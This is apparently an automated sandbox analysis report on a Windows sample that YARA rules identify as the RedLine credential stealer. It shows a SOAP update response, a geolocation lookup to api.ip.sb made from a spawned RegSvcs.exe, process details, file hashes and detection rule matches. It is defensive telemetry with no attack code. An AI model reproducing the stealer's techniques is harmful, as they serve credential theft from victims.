                                                                                                                                              Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                              Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.449737104.26.12.314437452C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-02-21 18:26:42 UTC64OUTGET /geoip HTTP/1.1
                                                                                                                                              Host: api.ip.sb
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              2025-02-21 18:26:42 UTC945INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 21 Feb 2025 18:26:42 GMT
                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TqyfshamCdwmXdNJP5pPzQlZ34byBWXYD4G0p%2BdzoeQJO%2BmJJZQWGqtAr85FOcfFXAm5yCkxUABv2DL7Z7QDdW2R8%2Bj%2FYkVHhFdlUunb8Th%2BRE5lkKwEz3iAjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 9158c94638421a1f-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1955&rtt_var=743&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2805&recv_bytes=678&delivery_rate=1464393&cwnd=232&unsent_bytes=0&cid=454b2f40121a9042&ts=917&x=0"
                                                                                                                                              2025-02-21 18:26:42 UTC351INData Raw: 31 35 38 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 36 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6f 66 66 73 65 74 22 3a 2d 31 38 30 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 61 74 69 74 75 64 65
                                                                                                                                              Data Ascii: 158{"organization":"CenturyLink","longitude":-74.0066,"city":"New York","timezone":"America\/New_York","isp":"CenturyLink","offset":-18000,"region":"New York","asn":3356,"asn_organization":"LEVEL3","country":"United States","ip":"8.46.123.189","latitude
                                                                                                                                              2025-02-21 18:26:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:13:26:30
                                                                                                                                              Start date:21/02/2025
                                                                                                                                              Path:C:\Users\user\Desktop\yGu4YUwMl6.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\yGu4YUwMl6.exe"
                                                                                                                                              Imagebase:0x210000
                                                                                                                                              File size:589'824 bytes
                                                                                                                                              MD5 hash:1161B525009E7448837A658EECC04275
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:13:26:33
                                                                                                                                              Start date:21/02/2025
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                              Imagebase:0x250000
                                                                                                                                              File size:45'984 bytes
                                                                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:13:26:33
                                                                                                                                              Start date:21/02/2025
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                              Imagebase:0x510000
                                                                                                                                              File size:45'984 bytes
                                                                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:13:26:33
                                                                                                                                              Start date:21/02/2025
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                              File size:862'208 bytes
                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >